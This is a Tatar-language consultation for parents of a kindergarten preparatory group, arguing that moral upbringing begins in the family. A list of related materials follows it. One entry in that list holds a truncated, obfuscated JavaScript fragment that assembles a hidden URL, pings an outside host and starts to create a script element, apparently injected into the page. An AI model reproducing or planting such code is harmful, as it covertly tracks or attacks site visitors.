Тәрбия гаиләдән башлана
консультация (подготовительная группа)

Залялеева Рамзия Файзулловна

Бу язмада ата - аналарга балаларны әдәпле, мәрхәмәтле итеп тәрбияләү өчен киңәшләр бирелә.

Скачать:

ВложениеРазмер
Файл консультация для родителей18.1 КБ

Предварительный просмотр:

           Тәрбия гаиләдән башлана

Һәр тәрбияче Һәм ата – ана үзенең баласының сәламәт Һәм бәхетле булуын тели Һәм шуңа ирешүне максат итеп куя. Әмма барыбыз да ничек итеп әдапле, тирә – як мөхиткә, табигатькә игътибарлы итеп тәрбияләү турында уйланабыз микән?

Әлбәттә, моның сере бик гади – без балаларны сәламәт яшәү рәвешенә күнектерергә тиешбез. Яман гадәтләрдән арындырырга, дөрес тукланырга, кешеләргә карата эчкерсез мөнәсәбәттә булырга өйрәтергә тиешбез. Бүген җәмгыятьтә барлыкка килгән күрешешләр гаиләнең әхлакый нигезе урнашуга да кире йогынты ясый. Психологлар һәм педагог – галимнәр әйтүенчә, файдалы гадәтләр булдыру өчен иң уңай вакыт – мәктәпкәчә тәрбия алу чоры. Мәгълүм булганча, бала күп вакытын гаиләдә үтеәрә. Биредә, әлбәттә, ата – ананың үз – үзен тотуы балага үрнәк булып тора. Шуңа күрә тәрбияви эшне ата – анадан башлау дөресрәк. Моның өчен гаиләдә тынычлык, узара ярдәмләшү, гаиләдәге кешеләр сәламәтлеге турында кайгырту – матур гадәтләрнең берсе. Безнең “Тату гаилә” балалар бакчасында һәм өйдә баланың индивидуаль сәләтен үстерүгә уңайлы шартлар тудыру өчен бакча һәм гаилә арасында уңай мөнәсәбәтләр булдыру тәрбия эшенең төп максатларыннан санала. Бу җәһәттән ата – аналар белән очрашып әңгәмәләр кору, гаиләләр белән спорт уеннары оештыру да тәрбия бирүнең төп юнәлешләренең берсе.

Бала шәхес буларак тулысынча ачылсын өчен, аның янында аны аңлаган, ягымлы сүзләр белән җылыткан, кирәк чакта яклый белгән ата – анасы булырга тиеш. Гаилә – баланың төп тәрбиячесе, тотрыклы гаилә традицияләре булмаган  өйдә балага дөрес тәрбия биреп, аны әхлаклы итеп үстерү дә бик авыр була.

Тәрбия бирү учакларында шәҗәрә бәйрәмнәре үтеәрүгә дә зур игьтибар юнәлтелә. Гаилә әгзалары белән бакчаларда бергә чаралар оештыру балада әдәп тәрбияләү мәсьәләләрен хәл итәргә мөмкинлек бирә. Безгә шуны онытмаска кирәк: бары тик бердәм, мәдәниятле милләт кенә җинаятьчелек, наркомания кебек начар гадәтләргә каршы тора алачак.


По теме: методические разработки, презентации и конспекты

Гаиләдә баланы тәрбияләү Һәр сабый тумыштан килә торган үзенчәлекләргә ия, әмма аның нинди булып үсүе нигездә тәрбиягә бәйле. Баланың акыл үсеше, әхлакый сыйфатлары , тирә-юньдәгеләргә мөнәсәбәте, барысыннан да элек , гаиләдә формалаша.

Һәр сабый тумыштан килә торган үзенчәлекләргә ия, әмма аның нинди булып үсүе нигездә тәрбиягә бәйле. Баланың акыл үсеше, әхлакый сыйфатлары , тирә-юньдәгеләргә мөнәсәбәте, барысыннан да элек , г...

Әти – әниләр өчен киңәшләр «Тәрбия гаиләдән башлана » Кечкенәләр төркеме

Әти – әниләр өчен киңәшләр«Тәрбия гаиләдән башлана »Кечкенәләр төркеме...

Тәрбиянең нигезе, гаиләдән башлана.

Консультация для родителей, о том что воспитание начинается с семьи...

Әти – әниләр өчен киңәшләр «Тәрбия гаиләдән башлана »

Әти – әниләр өчен киңәшләр«Тәрбия гаиләдән башлана »...

Әти – әниләр өчен киңәшләр «Тәрбия гаиләдән башлана » Кечкенәләр төркеме

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'hlzeeb.lussoit.com\',\'39\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.creat...

"Әти-әниләр белән әңгәмә. Тәрбия гаиләдэн башлана."

 Һәр тәрбияче һәм ата- ана үзенең баласының сәламәт һәм бәхетле булуын тели һәм шуңа ирешүне максат итеп куя. Әмма барыбыз да балаларны ничек итеп әдәпле, тирә - як мөхиткә, табигатькә игь...